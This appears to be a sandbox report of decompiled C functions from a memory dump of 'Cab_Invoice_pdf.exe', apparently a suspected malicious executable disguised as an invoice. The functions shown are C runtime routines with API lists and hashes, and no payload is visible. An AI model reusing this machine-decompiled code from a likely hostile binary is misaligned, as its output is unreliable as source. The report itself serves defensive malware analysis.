                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E013201DD(void* __ecx, intOrPtr _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _t10;
                            				int _t12;
                            				int _t19;
                            				signed int _t21;
                            
                            				_t10 =  *0x133c008; // 0xa3433343
                            				_v8 = _t10 ^ _t21;
                            				_v12 = _v12 & 0x00000000;
                            				_t12 =  &_v12;
                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                            				if(_t12 != 0) {
                            					_t12 = GetProcAddress(_v12, "CorExitProcess");
                            					_t19 = _t12;
                            					if(_t19 != 0) {
                            						 *0x133019c(_a4);
                            						_t12 =  *_t19();
                            					}
                            				}
                            				if(_v12 != 0) {
                            					_t12 = FreeLibrary(_v12);
                            				}
                            				E0131786A();
                            				return _t12;
                            			}

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002), ref: 013201FD
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01320210
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction ID: df960972871a1bb0b8f81588e731659e347d87df2ae383f1bc2075812b6b3f83
                            • Opcode Fuzzy Hash: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction Fuzzy Hash: F8F06235A1021CBFDB299F95DC09B9DBFBCEF49716F000169F909A2240DB349A44CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E013205E4(signed int* __ecx, signed int __edx) {
                            				signed int _v8;
                            				intOrPtr* _v12;
                            				signed int _v16;
                            				signed int _t28;
                            				signed int _t29;
                            				intOrPtr _t33;
                            				signed int _t37;
                            				signed int _t38;
                            				signed int _t40;
                            				void* _t50;
                            				signed int _t56;
                            				intOrPtr* _t57;
                            				signed int _t68;
                            				signed int _t71;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t75;
                            				signed int _t78;
                            				signed int _t80;
                            				signed int* _t81;
                            				signed int _t85;
                            				void* _t86;
                            
                            				_t72 = __edx;
                            				_v12 = __ecx;
                            				_t28 =  *__ecx;
                            				_t81 =  *_t28;
                            				if(_t81 != 0) {
                            					_t29 =  *0x133c008; // 0xa3433343
                            					_t56 =  *_t81 ^ _t29;
                            					_t78 = _t81[1] ^ _t29;
                            					_t83 = _t81[2] ^ _t29;
                            					asm("ror edi, cl");
                            					asm("ror esi, cl");
                            					asm("ror ebx, cl");
                            					if(_t78 != _t83) {
                            						L14:
                            						 *_t78 = E0131F6AC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                            						_t33 = E01319353(_t56);
                            						_t57 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                            						_t24 = _t78 + 4; // 0x4
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E01319353(_t24);
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E01319353(_t83);
                            						_t37 = 0;
                            						L15:
                            						return _t37;
                            					}
                            					_t38 = 0x200;
                            					_t85 = _t83 - _t56 >> 2;
                            					if(_t85 <= 0x200) {
                            						_t38 = _t85;
                            					}
                            					_t80 = _t38 + _t85;
                            					if(_t80 == 0) {
                            						_t80 = 0x20;
                            					}
                            					if(_t80 < _t85) {
                            						L9:
                            						_push(4);
                            						_t80 = _t85 + 4;
                            						_push(_t80);
                            						_v8 = E0132850F(_t56);
                            						_t40 = E013209EB(0);
                            						_t68 = _v8;
                            						_t86 = _t86 + 0x10;
                            						if(_t68 != 0) {
                            							goto L11;
                            						}
                            						_t37 = _t40 | 0xffffffff;
                            						goto L15;
                            					} else {
                            						_push(4);
                            						_push(_t80);
                            						_v8 = E0132850F(_t56);
                            						E013209EB(0);
                            						_t68 = _v8;
                            						_t86 = _t86 + 0x10;
                            						if(_t68 != 0) {
                            							L11:
                            							_t56 = _t68;
                            							_v8 = _t68 + _t85 * 4;
                            							_t83 = _t68 + _t80 * 4;
                            							_t78 = _v8;
                            							_push(0x20);
                            							asm("ror eax, cl");
                            							_t71 = _t78;
                            							_v16 = 0 ^  *0x133c008;
                            							asm("sbb edx, edx");
                            							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                            							_v8 = _t74;
                            							if(_t74 == 0) {
                            								goto L14;
                            							}
                            							_t75 = _v16;
                            							_t50 = 0;
                            							do {
                            								_t50 = _t50 + 1;
                            								 *_t71 = _t75;
                            								_t71 = _t71 + 4;
                            							} while (_t50 != _v8);
                            							goto L14;
                            						}
                            						goto L9;
                            					}
                            				}
                            				return _t28 | 0xffffffff;
                            			}


























                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: fa05b3bcb4958fcab91e3608216370743745659588d97783abe2b27327ea45b9
                            • Instruction ID: 6ade030b4dd62635b40d77d7f612ad806c8e9e11078fe5e7ac706b52b2b1f7ee
                            • Opcode Fuzzy Hash: fa05b3bcb4958fcab91e3608216370743745659588d97783abe2b27327ea45b9
                            • Instruction Fuzzy Hash: E2410832A002249FDB28EF7CC880A5EB7F5EF89328F254599E555EB385D731E905CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E0131E132(void* __ecx, short* _a4, short* _a8) {
                            				int _t7;
                            				char* _t13;
                            				signed int _t14;
                            				char* _t15;
                            				int _t19;
                            				intOrPtr* _t20;
                            				short* _t21;
                            				void* _t22;
                            				void* _t25;
                            				int _t29;
                            				int _t33;
                            				intOrPtr _t35;
                            				char* _t36;
                            
                            				_t25 = __ecx;
                            				_t7 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                            				_t21 = _a8;
                            				_t33 = _t7;
                            				_t35 = 0x2a;
                            				if(_t33 != 0) {
                            					if(_t21 != 0) {
                            						_t19 = WideCharToMultiByte(0, 0, _t21, 0xffffffff, 0, 0, 0, 0);
                            						if(_t19 == 0) {
                            							goto L1;
                            						} else {
                            							_t33 = _t33 + _t19;
                            						}
                            					}
                            				} else {
                            					L1:
                            					_t20 = E0131C9CE();
                            					_t33 = 0;
                            					 *_t20 = _t35;
                            				}
                            				_t36 = E01320B10(_t25, _t33, 1);
                            				if(_t36 == 0) {
                            					L8:
                            					_t22 = 0;
                            				} else {
                            					_t29 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t36, _t33, 0, 0);
                            					if(_t29 != 0) {
                            						if(_t21 == 0) {
                            							L12:
                            							_t13 = _t36;
                            							_t36 = 0;
                            							_push(0);
                            							_push(_t13);
                            							_t14 = E01326882(0);
                            							asm("sbb bl, bl");
                            							_t22 =  ~_t14 + 1;
                            						} else {
                            							_t15 = _t29 + _t36;
                            							 *((char*)(_t15 - 1)) = 0x3d;
                            							if(WideCharToMultiByte(0, 0, _t21, 0xffffffff, _t15, _t33 - _t29, 0, 0) == 0) {
                            								goto L7;
                            							} else {
                            								goto L12;
                            							}
                            						}
                            					} else {
                            						L7:
                            						 *((intOrPtr*)(E0131C9CE())) = 0x2a;
                            						goto L8;
                            					}
                            				}
                            				E013209EB(_t36);
                            				return _t22;
                            			}

















                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E147
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E173
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E19C
                            • _free.LIBCMT ref: 0131E1B6
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E1DB
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_free
                            • String ID:
                            • API String ID: 4292660327-0
                            • Opcode ID: c67f93c30dbabed9e435354cc9feb4e9bb13382df00983e365696809f3467902
                            • Instruction ID: abd3a894079bf9fc1e1a306f17984d7469b662d96d7c71592780906825045d3b
                            • Opcode Fuzzy Hash: c67f93c30dbabed9e435354cc9feb4e9bb13382df00983e365696809f3467902
                            • Instruction Fuzzy Hash: 8521A8B26493257EFB2A19799C48DBB6A9DDB86B78B140239FD15C71C4DD718C008670
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E01327C60() {
                            				int _v8;
                            				void* __ecx;
                            				void* _t6;
                            				int _t7;
                            				char* _t13;
                            				int _t17;
                            				void* _t19;
                            				char* _t25;
                            				WCHAR* _t27;
                            
                            				_t27 = GetEnvironmentStringsW();
                            				if(_t27 == 0) {
                            					L7:
                            					_t13 = 0;
                            				} else {
                            					_t6 = E01327C29(_t27);
                            					_pop(_t19);
                            					_t17 = _t6 - _t27 >> 1;
                            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                            					_v8 = _t7;
                            					if(_t7 == 0) {
                            						goto L7;
                            					} else {
                            						_t25 = E01320A25(_t19, _t7);
                            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                            							_t13 = 0;
                            						} else {
                            							_t13 = _t25;
                            							_t25 = 0;
                            						}
                            						E013209EB(_t25);
                            					}
                            				}
                            				if(_t27 != 0) {
                            					FreeEnvironmentStringsW(_t27);
                            				}
                            				return _t13;
                            			}













                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 01327C69
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01327C8C
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01327CB2
                            • _free.LIBCMT ref: 01327CC5
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01327CD4
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: be5c9a170883a9fd50af37d43aad9315b5ff28208c11e90a81172bd7fab6ea02
                            • Instruction ID: df37e526d0434a0cd369ce64ff282b53be1677698fa0949e87314868d07fd239
                            • Opcode Fuzzy Hash: be5c9a170883a9fd50af37d43aad9315b5ff28208c11e90a81172bd7fab6ea02
                            • Instruction Fuzzy Hash: DC0184726012397FFB25767A5D88C7F7D6DFED2EA8714012DFA04C3204DA608C0182B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 81%
                            			E013244A9(void* __ecx) {
                            				intOrPtr _t2;
                            				void* _t4;
                            				void* _t10;
                            				void* _t11;
                            				void* _t13;
                            				void* _t15;
                            				long _t16;
                            
                            				_t11 = __ecx;
                            				_t16 = GetLastError();
                            				_t10 = 0;
                            				_t2 =  *0x133c238; // 0x6
                            				_t19 = _t2 - 0xffffffff;
                            				if(_t2 == 0xffffffff) {
                            					L2:
                            					_t15 = E01320B10(_t11, 1, 0x364);
                            					_pop(_t13);
                            					if(_t15 != 0) {
                            						_t4 = E01323862(_t13, __eflags,  *0x133c238, _t15);
                            						__eflags = _t4;
                            						if(_t4 != 0) {
                            							E01324297(_t13, _t15, 0x13463f0);
                            							E013209EB(_t10);
                            							__eflags = _t15;
                            							if(_t15 != 0) {
                            								goto L9;
                            							} else {
                            								goto L8;
                            							}
                            						} else {
                            							_push(_t15);
                            							goto L4;
                            						}
                            					} else {
                            						_push(_t10);
                            						L4:
                            						E013209EB();
                            						L8:
                            						SetLastError(_t16);
                            					}
                            				} else {
                            					_t15 = E0132380C(_t11, _t19, _t2);
                            					if(_t15 != 0) {
                            						L9:
                            						SetLastError(_t16);
                            						_t10 = _t15;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				return _t10;
                            			}











                            APIs
                            • GetLastError.KERNEL32(?,?,?,0131C9D3,01320B62,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 013244AE
                            • _free.LIBCMT ref: 013244E3
                            • _free.LIBCMT ref: 0132450A
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324517
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324520
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 7e68e8810b6dc87b2f85faf73e279bed7baf442d7019479e3ab7c1280daf2c57
                            • Instruction ID: e2ee204e82f04d08dde2e9175464667eb0a54b2a2cb2e8f7cc3d7b8f2265c890
                            • Opcode Fuzzy Hash: 7e68e8810b6dc87b2f85faf73e279bed7baf442d7019479e3ab7c1280daf2c57
                            • Instruction Fuzzy Hash: BE017833200732A7C227763D5C48E2B26AEDFC1A7CF300126F90AF3541EF60C8058261
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01327E7E(intOrPtr* _a4) {
                            				intOrPtr _t6;
                            				intOrPtr* _t21;
                            				void* _t23;
                            				void* _t24;
                            				void* _t25;
                            				void* _t26;
                            				void* _t27;
                            
                            				_t21 = _a4;
                            				if(_t21 != 0) {
                            					_t23 =  *_t21 -  *0x133c838; // 0x133c830
                            					if(_t23 != 0) {
                            						E013209EB(_t7);
                            					}
                            					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x133c83c; // 0x1346555
                            					if(_t24 != 0) {
                            						E013209EB(_t8);
                            					}
                            					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x133c840; // 0x1346555
                            					if(_t25 != 0) {
                            						E013209EB(_t9);
                            					}
                            					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x133c868; // 0x133c834
                            					if(_t26 != 0) {
                            						E013209EB(_t10);
                            					}
                            					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                            					_t27 = _t6 -  *0x133c86c; // 0x1346558
                            					if(_t27 != 0) {
                            						return E013209EB(_t6);
                            					}
                            				}
                            				return _t6;
                            			}











                            APIs
                            • _free.LIBCMT ref: 01327E96
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327EA8
                            • _free.LIBCMT ref: 01327EBA
                            • _free.LIBCMT ref: 01327ECC
                            • _free.LIBCMT ref: 01327EDE
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d56e15c952441aac06a1d4fb5074be491641f661e5189ca445fee8d3c1c159da
                            • Instruction ID: 9f0fc0fffab5b5df90b5786edacd0b08afae64de6f7a1e93bcd8a6d61d340e75
                            • Opcode Fuzzy Hash: d56e15c952441aac06a1d4fb5074be491641f661e5189ca445fee8d3c1c159da
                            • Instruction Fuzzy Hash: 53F0FF32604224ABE624FB5DE482C1B7BEDBA14B28B641807F14DEB514C730FC8087A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E01320833(signed int __ecx) {
                            				intOrPtr _t7;
                            
                            				asm("lock xadd [eax], ecx");
                            				if((__ecx | 0xffffffff) == 0) {
                            					_t7 =  *0x133c828; // 0x105f6f8
                            					if(_t7 != 0x133c608) {
                            						E013209EB(_t7);
                            						 *0x133c828 = 0x133c608;
                            					}
                            				}
                            				E013209EB( *0x134630c);
                            				 *0x134630c = 0;
                            				E013209EB( *0x1346310);
                            				 *0x1346310 = 0;
                            				E013209EB( *0x1345e70);
                            				 *0x1345e70 = 0;
                            				E013209EB( *0x1345e74);
                            				 *0x1345e74 = 0;
                            				return 1;
                            			}





                            APIs
                            • _free.LIBCMT ref: 01320851
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01320863
                            • _free.LIBCMT ref: 01320876
                            • _free.LIBCMT ref: 01320887
                            • _free.LIBCMT ref: 01320898
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 261fbeb1b9b07a62a33a4fce966d80fc9120102b58a8956e736adc1b83888e9d
                            • Instruction ID: d7d16b544a83020e4f203888848185fe598873af0cdd4b14f7f71a749fd32dbb
                            • Opcode Fuzzy Hash: 261fbeb1b9b07a62a33a4fce966d80fc9120102b58a8956e736adc1b83888e9d
                            • Instruction Fuzzy Hash: E9F030BA9012318BDA357F69F40284A3FE8E719B34B015A07F41566268CF762D458FC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E0131F756(intOrPtr _a4) {
                            				signed int _v8;
                            				void* _v12;
                            				char _v16;
                            				intOrPtr* _t35;
                            				struct HINSTANCE__* _t36;
                            				struct HINSTANCE__* _t42;
                            				intOrPtr* _t43;
                            				intOrPtr* _t44;
                            				WCHAR* _t48;
                            				struct HINSTANCE__* _t49;
                            				struct HINSTANCE__* _t53;
                            				intOrPtr* _t56;
                            				struct HINSTANCE__* _t61;
                            				intOrPtr _t62;
                            
                            				if(_a4 == 2 || _a4 == 1) {
                            					GetModuleFileNameW(0, 0x1345eb0, 0x104);
                            					_t48 =  *0x1345e7c; // 0x1051c2a
                            					 *0x1345e80 = 0x1345eb0;
                            					if(_t48 == 0 ||  *_t48 == 0) {
                            						_t48 = 0x1345eb0;
                            					}
                            					_v8 = 0;
                            					_v16 = 0;
                            					E0131F875(_t48, 0, 0,  &_v8,  &_v16);
                            					_t61 = E0131F9FB(_v8, _v16, 2);
                            					if(_t61 != 0) {
                            						E0131F875(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                            						if(_a4 != 1) {
                            							_v12 = 0;
                            							_push( &_v12);
                            							_t49 = E01327493(_t61);
                            							if(_t49 == 0) {
                            								_t56 = _v12;
                            								_t53 = 0;
                            								_t35 = _t56;
                            								if( *_t56 == 0) {
                            									L15:
                            									_t36 = 0;
                            									 *0x1345e6c = _t53;
                            									_v12 = 0;
                            									_t49 = 0;
                            									 *0x1345e74 = _t56;
                            									L16:
                            									E013209EB(_t36);
                            									_v12 = 0;
                            									goto L17;
                            								} else {
                            									goto L14;
                            								}
                            								do {
                            									L14:
                            									_t35 = _t35 + 4;
                            									_t53 =  &(_t53->i);
                            								} while ( *_t35 != 0);
                            								goto L15;
                            							}
                            							_t36 = _v12;
                            							goto L16;
                            						}
                            						 *0x1345e6c = _v8 - 1;
                            						_t42 = _t61;
                            						_t61 = 0;
                            						 *0x1345e74 = _t42;
                            						goto L10;
                            					} else {
                            						_t43 = E0131C9CE();
                            						_push(0xc);
                            						_pop(0);
                            						 *_t43 = 0;
                            						L10:
                            						_t49 = 0;
                            						L17:
                            						E013209EB(_t61);
                            						return _t49;
                            					}
                            				} else {
                            					_t44 = E0131C9CE();
                            					_t62 = 0x16;
                            					 *_t44 = _t62;
                            					E01321788();
                            					return _t62;
                            				}
                            			}


















                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Cab_Invoice_pdf.exe,00000104), ref: 0131F791
                            • _free.LIBCMT ref: 0131F85C
                            • _free.LIBCMT ref: 0131F866
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                            • API String ID: 2506810119-125003824
                            • Opcode ID: 7f77fdf47c1f6fbee2ebc327c88bc4ae18478eb826bcb05116aa8593428ecacc
                            • Instruction ID: 5ec9d2aefa12972e1298bd1f9c83a26dea9c491dbc337891cb509af0698c1db8
                            • Opcode Fuzzy Hash: 7f77fdf47c1f6fbee2ebc327c88bc4ae18478eb826bcb05116aa8593428ecacc
                            • Instruction Fuzzy Hash: B2318075E00229EFDB39DF9DD88099EBFFCEB85714B144166E90897204D6B09E45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E0131F193(void* __ecx, char* _a4, char** _a8) {
                            				char* _v8;
                            				intOrPtr _v12;
                            				signed short* _v36;
                            				void* _t14;
                            				void* _t15;
                            				char** _t16;
                            				char* _t20;
                            				void* _t27;
                            				signed int* _t28;
                            				signed int* _t32;
                            				void* _t39;
                            				void* _t52;
                            				signed int _t57;
                            				signed short* _t58;
                            				intOrPtr _t59;
                            				char* _t61;
                            				char* _t62;
                            				signed int _t64;
                            				signed int* _t66;
                            				char* _t68;
                            				signed short* _t70;
                            
                            				_t39 = __ecx;
                            				_push(__ecx);
                            				_v8 = 0;
                            				_t14 = E01326CA2( &_v8, 0, L"TMP");
                            				if(_t14 == 0) {
                            					_t68 = _v8;
                            					_t61 = _t68;
                            					if(_t68 == 0) {
                            						goto L10;
                            					} else {
                            						_t20 = E01326D40(_t68, 0);
                            						if(_t20 != 0) {
                            							_push(_t61);
                            							L19();
                            							_t61 = _t20;
                            							if(_t61 == 0 || E01326D40(_t61, 0) != 0) {
                            								E013209EB(_t61);
                            								goto L10;
                            							} else {
                            								 *_a8 = _t61;
                            								E013209EB(0);
                            							}
                            						} else {
                            							_t68 = 0;
                            							 *_a8 = _t61;
                            						}
                            					}
                            					goto L17;
                            				} else {
                            					if(_t14 == 0x16) {
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E01321798();
                            						asm("int3");
                            						_push(_t39);
                            						_push(0);
                            						_push(_t67);
                            						_t70 = _v36;
                            						_push(_t60);
                            						_t52 = 0;
                            						_t27 = 0;
                            						_t58 = _t70;
                            						_t64 =  *_t70 & 0x0000ffff;
                            						if(_t64 == 0) {
                            							L34:
                            							_t28 = 0;
                            						} else {
                            							_v12 = 0x22;
                            							do {
                            								if(_t64 == _v12) {
                            									_t52 = _t52 + 1;
                            								}
                            								_t58 =  &(_t58[1]);
                            								_t27 = _t27 + 1;
                            								_t64 =  *_t58 & 0x0000ffff;
                            							} while (_t64 != 0);
                            							if(_t52 == 0) {
                            								goto L34;
                            							} else {
                            								_t66 = E01320B10(_t52, _t27 - _t52 + 1, 2);
                            								if(_t66 != 0) {
                            									_t32 = _t66;
                            									if( *_t70 != 0) {
                            										_t59 = _v12;
                            										do {
                            											_t57 =  *_t70 & 0x0000ffff;
                            											if(_t57 != _t59) {
                            												 *_t32 = _t57;
                            												_t32 =  &(_t32[0]);
                            											}
                            											_t70 =  &(_t70[1]);
                            										} while ( *_t70 != 0);
                            									}
                            									 *_t32 = 0;
                            								} else {
                            									_t66 = 0;
                            								}
                            								E013209EB(0);
                            								_t28 = _t66;
                            							}
                            						}
                            						return _t28;
                            					} else {
                            						_t68 = 0;
                            						L10:
                            						_t62 = _a4;
                            						if(_t62 == 0 || E01326D40(_t62, 0) != 0) {
                            							_t62 = "\\";
                            							_t15 = E01326D40(_t62, 0);
                            							_t16 = _a8;
                            							if(_t15 == 0) {
                            								goto L13;
                            							} else {
                            								 *_t16 = ".";
                            							}
                            						} else {
                            							_t16 = _a8;
                            							L13:
                            							 *_t16 = _t62;
                            						}
                            						_t61 = 0;
                            						L17:
                            						E013209EB(_t68);
                            						return _t61;
                            					}
                            				}
                            			}

























                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
